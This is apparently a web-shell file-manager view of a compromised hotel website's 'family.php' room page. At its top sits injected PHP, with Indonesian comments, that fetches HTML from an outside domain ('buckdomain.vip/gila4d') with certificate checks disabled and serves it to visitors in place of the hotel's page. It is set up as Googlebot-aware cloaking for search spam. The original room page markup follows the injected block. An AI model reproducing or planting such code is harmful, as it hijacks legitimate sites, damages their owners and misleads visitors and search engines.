File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/hotelrosemaryinn.com/family.php
Back
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/gila4d/hotelrosemaryinn.com-family.php.html'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia"; ?> <!DOCTYPE html> <html lang="zxx"> <head> <title>Family Room - Rosemary Inn</title> <!--<link rel="icon" href="images/favicon.png" type="image/gif" sizes="16x16">--> <meta content="text/html;charset=utf-8" http-equiv="Content-Type"> <meta content="width=device-width, initial-scale=1.0" name="viewport" > <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" id="bootstrap"> <link href="css/plugins.css" rel="stylesheet" type="text/css" > <link href="css/swiper.css" rel="stylesheet" type="text/css" > <link href="css/style.css" rel="stylesheet" type="text/css" > <link href="css/coloring.css" rel="stylesheet" type="text/css" > <link id="colors" href="css/colors/scheme-01.css" rel="stylesheet" type="text/css" > </head> <body> <div id="wrapper"> <?php include 'include/header1.php';?> <!-- content begin --> <div class="no-bottom no-top" id="content"> <div id="top"></div> <div class="no-bottom no-top" id="content"> <div id="top"></div> <section id="subheader" class="relative jarallax text-light"> <img src="images/background/11.jpg" class="jarallax-img" alt=""> <div class="container relative z-index-1000"> <div class="row justify-content-center"> <div class="col-lg-12 text-center"> <h1>Family Room</h1> <ul class="crumb"> <li><a href="index.php">Home</a></li> <li class="active">Family Room</li> </ul> </div> </div> </div> <div class="de-overlay"></div> </section> <section class="relative z-4 no-top no-bottom"> <div class="container"> <div class="row justify-content-center"> <div class="col-lg-8"> <div class="mt-70"> <div class="row g-0"> <div class="col-md-6 text-center"> <div class="bg-color text-light p-4 h-100 wow fadeInRight" data-wow-delay=".0s"> <div class="de_count fs-15 wow fadeInRight" data-wow-delay=".4s"> <h2 class="mb-0">₹ 4,500</h2> <span>/night</span> </div> </div> </div> <div class="col-md-6 text-center"> <div class="text-light p-4 h-100 wow fadeInRight" data-bgcolor="#171717" data-wow-delay=".2s"> <div class="de_count fs-15 wow fadeInRight" data-wow-delay=".6s"> <a class="btn-main btn-line no-bg mt-lg-4" href="https://bookings.asiatech.in/?page=9877&type=website">Book Now</a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="relative"> <div class="container"> <div class="row justify-content-center"> <div class="col-lg-10 text-center"> <h4 class="wow fadeInUp">Designed with families in mind, our Family Room offers both space and privacy for a relaxing stay together. With two interconnected rooms or a spacious open-plan layout (depending on availability), the suite includes multiple beds, ample storage, and a comfortable sitting area — perfect for evenings spent playing games, watching movies, or just talking over a warm drink. A well-equipped bathroom, extra amenities, and beautiful views round out this inviting space, making it a perfect base for family adventures in Agra.</h4> </div> </div> </div> <div class="spacer-single"></div> <div class="relative wow fadeIn"> <div class="owl-custom-nav menu-float" data-target="#room-carousel"> <a class="btn-next"></a> <a class="btn-prev"></a> <div id="room-carousel" class="owl-2-cols-center owl-carousel owl-theme"> <!-- room begin --> <div class="item"> <div class="hover relative text-light"> <img src="images/gallery/8.jpg" class="w-100" alt=""> </div> </div> <!-- room end --> <!-- room begin --> <div class="item"> <div class="hover relative text-light"> <img src="images/gallery/10.jpg" class="w-100" alt=""> </div> </div> <!-- room end --> <!-- room begin --> <div class="item"> <div class="hover relative text-light"> <img src="images/gallery/11.jpg" class="w-100" alt=""> </div> </div> </div> </div> </div> <div class="spacer-double"></div> </section> </div> <?php include 'include/footer.php';?> </div> <script data-cfasync="false" src="../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="js/plugins.js"></script> <script src="js/designesia.js"></script> <script src="js/swiper.js"></script> <script src="js/custom-marquee.js"></script> <script src="js/custom-swiper-2.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.03 |
proxy
|
phpinfo
|
Settings